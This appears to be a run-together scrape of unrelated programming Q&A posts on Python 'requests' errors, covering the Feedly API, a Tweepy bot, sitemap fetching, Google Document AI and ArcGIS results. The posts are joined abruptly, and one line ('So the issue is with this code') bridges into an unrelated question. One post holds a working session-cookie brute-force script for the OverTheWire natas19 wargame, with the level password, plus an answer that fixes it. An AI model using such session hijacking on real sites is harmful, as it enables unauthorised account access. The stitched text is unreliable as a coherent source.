I'm trying to access the Feedly API to collect articles and share them automatically to a Facebook group. So far, I haven't even been able to figure out how to use the Feedly API wrapper located here: https://github.com/zgw21cn/FeedlyClient
import json
from feedlyclient import FeedlyClient

# Feedly
feedaccess = "removed"
myfeedId = "removed"
con = FeedlyClient()
con.get_feed_content(feedaccess, myfeedId, False, 10000)
parsed = json.loads(con)
print json.dumps(parsed)
Terminal
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 8, in <module>
con = FeedlyClient.get_feed_content(feedaccess,myfeedId,False,10000)
TypeError: unbound method get_feed_content() must be called with FeedlyClient instance as first argument (got str instance instead)
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 9, in <module>
con.get_feed_content(feedaccess,myfeedId,False,10000)
File "d:\Python Projects\Python 2\fbauto\feedlyclient.py", line 75, in get_feed_content
return res.json()
File "C:\Python27\lib\site-packages\requests\models.py", line 892, in json
return complexjson.loads(self.text, **kwargs)
File "C:\Python27\lib\json\__init__.py", line 339, in loads
return _default_decoder.decode(s)
File "C:\Python27\lib\json\decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "C:\Python27\lib\json\decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
Please help.
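For reference, the first TypeError just means get_feed_content was called on the FeedlyClient class itself rather than on an instance. A minimal sketch of the corrected call, assuming the wrapper's constructor takes no required arguments (the token and stream ID are placeholders):

import json
from feedlyclient import FeedlyClient

client = FeedlyClient()  # create an instance first...
content = client.get_feed_content("ACCESS_TOKEN", "STREAM_ID", False, 10000)  # ...then call the method on it
# get_feed_content already returns a parsed dict (it ends with `return res.json()`),
# so no json.loads() call is needed on the result
print(json.dumps(content, indent=4))

The second error, ValueError: No JSON object could be decoded, is raised while parsing the HTTP response body, which usually means the server returned something other than JSON (an empty body or an error page), so the request itself (token, URL) is worth checking rather than the parsing code.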
SECOND ATTEMPT
import json
import requests

# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"

def get_feed_content(unreadOnly=None, newerThan=None, count="10",
                     continuation=None, ranked=None):
    """
    Return the contents of a feed.
    :param unreadOnly:
    :param newerThan:
    :param count:
    :param continuation:
    :param ranked:
    :return:
    """
    headers = {'Authorization': 'OAuth ' + feedaccess}
    quest_url = 'http://cloud.feedly.com/v3/streams/contents'
    params = dict(streamId=myfeedid)
    # Optional parameters
    if unreadOnly is not None:
        params['unreadOnly'] = unreadOnly
    if newerThan is not None:
        params['newerThan'] = newerThan
    if count is not None:
        params['count'] = count
    if continuation is not None:
        params['continuation'] = continuation
    if ranked is not None:
        params['ranked'] = ranked
    res = requests.get(url=quest_url, params=params, headers=headers)
    return res.json()

con = get_feed_content()
print json.dumps(con, indent=4)
TERMINAL
{
    "items": [],
    "id": "user/REMOVED/category/tutorial"
}
It just returns the stream ID with an empty items list. The Feedly documentation says I can use a category as a stream ID: https://developer.feedly.com/v3/streams/
THIRD ATTEMPT
import json
import requests
from client import FeedlyClient
# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"
feedcount = "20"
myurl = "http://cloud.feedly.com/v3/streams/contents?streamId=" + myfeedid + "&count=" + feedcount
headers = {'Authorization': 'OAuth ' + feedaccess}
res = requests.get(url=myurl, headers=headers)
con = res.json()
print json.dumps(con, indent=4)
SAME TERMINAL RESPONSE
The third attempt worked. There was a capitalization error in my category name: it should be Tutorial, not tutorial. Please see the original post for the code.
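For completeness, here is a sketch of the working request with the corrected, case-sensitive category name, letting requests encode the query string via params= instead of concatenating it by hand (the token and user ID are placeholders):

import json
import requests

feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/Tutorial"  # capital T: the category name is case-sensitive
headers = {'Authorization': 'OAuth ' + feedaccess}
params = {'streamId': myfeedid, 'count': '20'}
res = requests.get('http://cloud.feedly.com/v3/streams/contents', params=params, headers=headers)
print(json.dumps(res.json(), indent=4))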
So the issue is with this code.
import requests
import string
import binascii
import codecs

url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"

for i in range(0, 641):
    with requests.Session() as sesh:
        encoded = binascii.hexlify(bytes(test.format(i), "utf-8"))
        print("Trying: " + str(i) + "-admin")
        print(encoded)
        cookie = dict(PHPSESSID=encoded)
        sesh.post(url, auth=(user, passwd), cookies=cookie)
        r = sesh.get(url, auth=(user, passwd)).content
        print(r)
        print(sesh.cookies.get_dict())
        if "You are an admin." in str(r):
            print("Success! Admin website:\n" + str(sesh.get(url, auth=(user, passwd)).content))
            break
        else:
            print("Failed.")
binascii.hexlify returns a bytes value like b'302d61646d696e', but the later POST trips over it because requests expects the cookie value to be a str, not bytes:
Trying: 0-admin
b'302d61646d696e'
Traceback (most recent call last):
File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module>
sesh.post(url,auth=(user,passwd),cookies=cookie)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post
return self.request("POST", url, data=data, json=json, **kwargs)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request
prep = self.prepare_request(req)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie
and cookie.value.startswith('"')
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!
Try putting .decode('utf-8') at the end of the encoded = line:
import binascii
import requests

url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"

for i in range(0, 641):
    with requests.Session() as sesh:
        encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8')  # <-- put decode() here!
        print("Trying: " + str(i) + "-admin")
        print(encoded)
        cookie = dict(PHPSESSID=encoded)
        sesh.post(url, auth=(user, passwd), cookies=cookie)
        r = sesh.get(url, auth=(user, passwd)).content
        print(r)
        print(sesh.cookies.get_dict())
        if "You are an admin." in str(r):
            print(
                "Success! Admin website:\n"
                + str(sesh.get(url, auth=(user, passwd)).content)
            )
            break
        else:
            print("Failed.")
This is hopefully my last question for this project, since everything else is working fine. I can't figure out what's causing this error, though. Here is the code for my tweepy bot:
import tweepy
import random
import os
import json
import boto3

read = tweepy.Client(os.getenv('btok'))
write = tweepy.Client(
    consumer_key=os.getenv('ckey'),
    consumer_secret=os.getenv('csec'),
    access_token=os.getenv('atok'),
    access_token_secret=os.getenv('atos')
)

# declaring variables
user_id = 1568306756798775297
greet = random.choice(list(open('greetings.txt')))  # picking a random greeting from the list
reply = random.choice(list(open('replies.txt')))  # picking a random reply from the list
strings = {'hi', 'hello', 'hey', 'hai'}  # recognized greetings
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('lastid')

def main(event, context):
    # TODO implement
    reply()
    return {
        'statusCode': 200,
        'body': json.dumps('Hello from Lambda!')
    }

def reply():
    value = table.get_item(Key={'lastidkey': '1'})
    last = value['Item']['lidval']
    response = read.get_users_mentions(user_id, since_id=last)  # fetching new mentions
    for tweet in response.data:
        text = tweet.text
        id = tweet.id
        if any(x in text.lower() for x in strings):
            write.create_tweet(in_reply_to_tweet_id=id, text=greet)  # if they're greeting the bot, the bot will greet them back
        else:
            write.create_tweet(in_reply_to_tweet_id=id, text=reply)  # otherwise, it's a random reply
        table.put_item(Item={'lastidkey': '1', 'lidval': str(tweet.id)})  # writes latest id to dynamodb
The "greeting" part works fine, but the part under else: does not work at all. Here is the error message I get:
{
    "errorMessage": "Object of type function is not JSON serializable",
    "errorType": "TypeError",
    "requestId": "cb6423eb-e27e-4229-b322-c6df9fad3b5c",
    "stackTrace": [
        "  File \"/var/task/reply.py\", line 25, in main\n    reply()\n",
        "  File \"/var/task/reply.py\", line 41, in reply\n    write.create_tweet(in_reply_to_tweet_id=id, text=reply) # otherwise, it's a random reply\n",
        "  File \"/opt/python/tweepy/client.py\", line 824, in create_tweet\n    return self._make_request(\n",
        "  File \"/opt/python/tweepy/client.py\", line 126, in _make_request\n    response = self.request(method, route, params=request_params,\n",
        "  File \"/opt/python/tweepy/client.py\", line 83, in request\n    with self.session.request(\n",
        "  File \"/opt/python/requests/sessions.py\", line 573, in request\n    prep = self.prepare_request(req)\n",
        "  File \"/opt/python/requests/sessions.py\", line 484, in prepare_request\n    p.prepare(\n",
        "  File \"/opt/python/requests/models.py\", line 371, in prepare\n    self.prepare_body(data, files, json)\n",
        "  File \"/opt/python/requests/models.py\", line 511, in prepare_body\n    body = complexjson.dumps(json, allow_nan=False)\n",
        "  File \"/var/runtime/simplejson/__init__.py\", line 398, in dumps\n    return cls(\n",
        "  File \"/var/runtime/simplejson/encoder.py\", line 296, in encode\n    chunks = self.iterencode(o, _one_shot=True)\n",
        "  File \"/var/runtime/simplejson/encoder.py\", line 378, in iterencode\n    return _iterencode(o, 0)\n",
        "  File \"/var/runtime/simplejson/encoder.py\", line 272, in default\n    raise TypeError('Object of type %s is not JSON serializable' %\n"
    ]
}
Thanks everyone.
Solved it! In hindsight it was fairly obvious: the variable reply was throwing things off since it shares a name with the reply() function, so create_tweet was being handed the function itself. I renamed the variable and it works fine now.
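For anyone hitting the same error: the def reply(): statement runs after the module-level assignment and overwrites the string of the same name, so create_tweet(text=reply) was passing the function object, which is what simplejson refuses to serialize. A minimal sketch of the rename, reusing the setup from the question (reply_text is a name chosen here purely for illustration):

reply_text = random.choice(list(open('replies.txt')))  # no longer shares a name with reply()

def reply():
    value = table.get_item(Key={'lastidkey': '1'})
    last = value['Item']['lidval']
    response = read.get_users_mentions(user_id, since_id=last)
    for tweet in response.data:
        if any(x in tweet.text.lower() for x in strings):
            write.create_tweet(in_reply_to_tweet_id=tweet.id, text=greet)
        else:
            write.create_tweet(in_reply_to_tweet_id=tweet.id, text=reply_text)  # a plain string again, so it serializes
        table.put_item(Item={'lastidkey': '1', 'lidval': str(tweet.id)})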
I am iterating through a list of URLs from a CSV file, trying to locate their sitemaps, but a weird leading-space issue is causing an error when requests processes each URL. I'm trying to figure out what's producing this space and what kind of space it is. I suspect something is off with strip(), because the request runs fine when I copy and paste a URL directly into requests. I'm just not sure what type of space this is or what's causing it to occur.
Wondering if anyone else is having or had this issue?
So far I have tried to solve using the following methods:
replace()
"".join(split())
regex
Here is my code:
with open('links.csv') as f:
    for line in f:
        strdomain = line.strip()
        if strdomain:
            domain = strdomain
            fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '')
            ofile = fix_domain + '.txt'  # args.ofile
            domain_rem = domain
            map = find_sitemap.get_sitemap(domain_rem + "sitemap.xml")
            url_info = find_sitemap.parse_sitemap(map)
            print("Found {0} urls".format(len(url_info)))
            new_urls = []
            for u in url_info:
                new_urls.append(u)
                print(u)
links.csv looks like the following, with just one column:
https://site1.com/
https://site2.com/
https://site3.com/
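Incidentally, one way to pin down exactly which character is sneaking in (a diagnostic, not a fix) is to print the repr() of each raw line read from the file; invisible characters such as a UTF-8 byte-order mark ('\ufeff') or a non-breaking space ('\xa0') then show up literally instead of rendering as blank space:

with open('links.csv') as f:
    for line in f:
        print(repr(line))  # e.g. '\ufeffhttps://site1.com/\n' would reveal a BOM masquerading as a space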
I printed domain and strdomain, and even added the word "this" next to the variable domain, so you can see the space being produced clearly:
Here is the full error I receive when running it (you will notice there is no leading space in the URL once it's copied and pasted from the terminal into this post; the terminal screenshot below shows the space, though):
Traceback (most recent call last):
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module>
main()
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap
get_url = requests.get(url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request
resp = self.send(prep, **send_kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send
adapter = self.get_adapter(url=request.url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter
raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml'
Here is where you can see the leading space that occurs
Here is the code for "find_sitemap.py":
from bs4 import BeautifulSoup
import requests

def get_sitemap(url):
    get_url = requests.get(url)
    if get_url.status_code == 200:
        return get_url.text
    else:
        print('Unable to fetch sitemap: %s.' % url)

def process_sitemap(s):
    soup = BeautifulSoup(s, "lxml")
    result = []
    for loc in soup.findAll('loc'):
        item = {}
        item['loc'] = loc.text
        item['tag'] = loc.parent.name
        if loc.parent.lastmod is not None:
            item['lastmod'] = loc.parent.lastmod.text
        if loc.parent.changeFreq is not None:
            item['changeFreq'] = loc.parent.changeFreq.text
        if loc.parent.priority is not None:
            item['priority'] = loc.parent.priority.text
        result.append(item)
    return result

def is_sub_sitemap(s):
    if s['loc'].endswith('.xml') and s['tag'] == 'sitemap':
        return True
    else:
        return False

def parse_sitemap(s):
    sitemap = process_sitemap(s)
    result = []
    while sitemap:
        candidate = sitemap.pop()
        if is_sub_sitemap(candidate):
            sub_sitemap = get_sitemap(candidate['loc'])
            for i in process_sitemap(sub_sitemap):
                sitemap.append(i)
        else:
            result.append(candidate)
    return result
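If the repr() check suggested above turns up a byte-order mark ('\ufeff') at the start of the first line, note that str.strip() will not remove it; opening the file with the utf-8-sig encoding consumes it instead. A sketch, assuming the BOM is indeed the culprit:

with open('links.csv', encoding='utf-8-sig') as f:  # 'utf-8-sig' swallows a leading BOM if present
    urls = [line.strip() for line in f if line.strip()]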
I am getting this error when trying to implement Document OCR from Google Cloud in Python, as explained here: https://cloud.google.com/document-ai/docs/ocr
When I run
result = client.process_document(request=request)
I get this error
Traceback (most recent call last):
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/grpc_helpers.py", line 73, in error_remapped_callable
return callable_(*args, **kwargs)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/grpc/_channel.py", line 923, in __call__
return _end_unary_response_blocking(state, call, False, None)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/grpc/_channel.py", line 826, in _end_unary_response_blocking
raise _InactiveRpcError(state)
grpc._channel._InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.INVALID_ARGUMENT
details = "Request contains an invalid argument."
debug_error_string = "{"created":"#1614769280.332675000","description":"Error received from peer ipv4:142.250.180.138:443","file":"src/core/lib/surface/call.cc","file_line":1068,"grpc_message":"Request contains an invalid argument.","grpc_status":3}"
>
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "<input>", line 1, in <module>
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/cloud/documentai_v1beta3/services/document_processor_service/client.py", line 327, in process_document
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/gapic_v1/method.py", line 145, in __call__
return wrapped_func(*args, **kwargs)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/retry.py", line 281, in retry_wrapped_func
return retry_target(
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/retry.py", line 184, in retry_target
return target()
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/grpc_helpers.py", line 75, in error_remapped_callable
six.raise_from(exceptions.from_grpc_error(exc), exc)
File "<string>", line 3, in raise_from
google.api_core.exceptions.InvalidArgument: 400 Request contains an invalid argument.
My full code:
import os
# Import the base64 encoding library.

project_id = 'your-project-id'
location = 'eu'  # Format is 'us' or 'eu'
processor_id = 'your-processor-id'  # Create processor in Cloud Console
file_path = '/file_path/invoice.pdf'

os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "/full_path/your_credentials.json"

def process_document_sample(
    project_id: str, location: str, processor_id: str, file_path: str
):
    from google.cloud import documentai_v1beta3 as documentai

    # Instantiates a client
    client = documentai.DocumentProcessorServiceClient()

    # The full resource name of the processor, e.g.:
    # projects/project-id/locations/location/processor/processor-id
    # You must create new processors in the Cloud Console first
    name = f"projects/{project_id}/locations/{location}/processors/{processor_id}"

    with open(file_path, "rb") as image:
        image_content = image.read()

    # Read the file into memory
    document = {"content": image_content, "mime_type": "application/pdf"}

    # Configure the process request
    request = {"name": name, "document": document}

    # Recognizes text entities in the PDF document
    result = client.process_document(request=request)
    document = result.document
    print("Document processing complete.")

    # For a full list of Document object attributes, please reference this page: https://googleapis.dev/python/documentai/latest/_modules/google/cloud/documentai_v1beta3/types/document.html#Document
    document_pages = document.pages

    # Read the text recognition output from the processor
    print("The document contains the following paragraphs:")
    for page in document_pages:
        paragraphs = page.paragraphs
        for paragraph in paragraphs:
            paragraph_text = get_text(paragraph.layout, document)
            print(f"Paragraph text: {paragraph_text}")
client = documentai.DocumentProcessorServiceClient() points to the US endpoint by default:
>>> client = documentai.DocumentProcessorServiceClient()
>>> print(client.DEFAULT_ENDPOINT)
us-documentai.googleapis.com
You need to override the api_endpoint to EU for this to work.
from google.api_core.client_options import ClientOptions
# Set endpoint to EU
options = ClientOptions(api_endpoint="eu-documentai.googleapis.com:443")
# Instantiates a client
client = documentai.DocumentProcessorServiceClient(client_options=options)
Here is the full code:
import os

# TODO(developer): Uncomment these variables before running the sample.
project_id = 'your-project-id'
location = 'eu'  # Format is 'us' or 'eu'
processor_id = 'your-processor-id'  # Create processor in Cloud Console
file_path = '/file_path/invoice.pdf'

os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "/full_path/your_credentials.json"

def process_document_sample(
    project_id: str, location: str, processor_id: str, file_path: str
):
    from google.cloud import documentai_v1beta3 as documentai
    from google.api_core.client_options import ClientOptions

    # Set endpoint to EU
    options = ClientOptions(api_endpoint="eu-documentai.googleapis.com:443")

    # Instantiates a client
    client = documentai.DocumentProcessorServiceClient(client_options=options)

    # The full resource name of the processor, e.g.:
    # projects/project-id/locations/location/processor/processor-id
    # You must create new processors in the Cloud Console first
    name = f"projects/{project_id}/locations/{location}/processors/{processor_id}"

    with open(file_path, "rb") as image:
        image_content = image.read()

    # Read the file into memory
    document = {"content": image_content, "mime_type": "application/pdf"}

    # Configure the process request
    request = {"name": name, "document": document}

    # Recognizes text entities in the PDF document
    result = client.process_document(request=request)
    document = result.document
    print("Document processing complete.")

    # For a full list of Document object attributes, please reference this page: https://googleapis.dev/python/documentai/latest/_modules/google/cloud/documentai_v1beta3/types/document.html#Document
    document_pages = document.pages

    # Read the text recognition output from the processor
    print("The document contains the following paragraphs:")
    for page in document_pages:
        paragraphs = page.paragraphs
        for paragraph in paragraphs:
            # get_text is the text-anchor helper from Google's Document AI sample (not shown here)
            paragraph_text = get_text(paragraph.layout, document)
            print(f"Paragraph text: {paragraph_text}")
I am developing an application on App Engine and Python. This app is meant to create routes to several points in town. To create these routes, I invoke a request to an ArcGIS service. Once that is done, I need to check the status of the request and get JSON with the results. I check these results with the following method:
def store_route(job_id, token):
    import requests, json

    # Process stops result and store it as json in stops_response
    stops_url = "https://logistics.arcgis.com/arcgis/rest/services/World/VehicleRoutingProblem/GPServer/SolveVehicleRoutingProblem/jobs/"
    stops_url = stops_url + str(job_id) + "/results/out_stops?token=" + str(token) + "&f=json"
    stops_r = requests.get(stops_url)
    stops_response = json.loads(stops_r.text)

    # Process routes result and store it as json in routes_response
    routes_url = "https://logistics.arcgis.com/arcgis/rest/services/World/VehicleRoutingProblem/GPServer/SolveVehicleRoutingProblem/jobs/"
    routes_url = routes_url + str(job_id) + "/results/out_routes?token=" + str(token) + "&f=json"
    routes_r = requests.get(routes_url)
    routes_response = json.loads(routes_r.text)

    from routing.models import ArcGisJob, DeliveryRoute

    # Process each route from response
    processed_routes = []
    for route_info in routes_response['value']['features']:
        print route_info
        route_name = route_info['attributes']['Name']
        coordinates = route_info['geometry']['paths']
        coordinates_json = {"coordinates": coordinates}

        # Process stops from each route
        stops = []
        for route_stops in stops_response['value']['features']:
            if route_name == route_stops['attributes']['RouteName']:
                stops.append({"Name": route_stops['attributes']['Name'],
                              "Sequence": route_stops['attributes']['Sequence']})
        stops_json = {"content": stops}

        # Create new Delivery Route object
        processed_routes.append(DeliveryRoute(name=route_name, route_coordinates=coordinates_json, stops=stops_json))

    # insert a new Job table entry with all processed routes
    new_job = ArcGisJob(job_id=str(job_id), routes=processed_routes)
    new_job.put()
As you can see, my code basically walks the JSON returned by the service and parses out the content that interests me. The problem is that I get the following output:
{u'attributes': {
u'Name': u'ruta_4855443348258816',
...
u'StartTime': 1427356800000},
u'geometry': {u'paths': [[[-100.37766063699996, 25.67669987000005],
...
[-100.37716999999998, 25.67715000000004],
[-100.37766063699996, 25.67669987000005]]]}}
ERROR 2015-03-26 19:02:58,405 handlers.py:73] 'geometry'
Traceback (most recent call last):
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/routing/handlers.py", line 68, in get
arc_gis.store_route(job_id, token)
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/libs/arc_gis.py", line 150, in store_route
coordinates = route_info['geometry']['paths']
KeyError: 'geometry'
ERROR 2015-03-26 19:02:58,412 BaseRequestHandler.py:51] Traceback (most recent call last):
File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/lib/webapp2-2.5.2/webapp2.py", line 570, in dispatch
return method(*args, **kwargs)
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/routing/handlers.py", line 68, in get
arc_gis.store_route(job_id, token)
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/libs/arc_gis.py", line 150, in store_route
coordinates = route_info['geometry']['paths']
KeyError: 'geometry'
The actual JSON returned has a lot more info, but I just included a small portion of it so you can see that there IS a 'geometry' key. Any idea why I get this error?
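A guess, since only part of the JSON is shown: the printed feature proves that some features carry a 'geometry' key, but the KeyError is raised while looping, so a later feature in routes_response['value']['features'] may simply not have one (for instance, an empty or unassigned route might come back without a shape). A defensive rewrite of the start of the loop using dict.get makes the offending feature visible instead of crashing:

for route_info in routes_response['value']['features']:
    geometry = route_info.get('geometry')
    if geometry is None:
        # flag the feature that has no geometry instead of raising KeyError
        print('No geometry for feature: %s' % route_info['attributes'].get('Name'))
        continue
    coordinates = geometry['paths']
    coordinates_json = {"coordinates": coordinates}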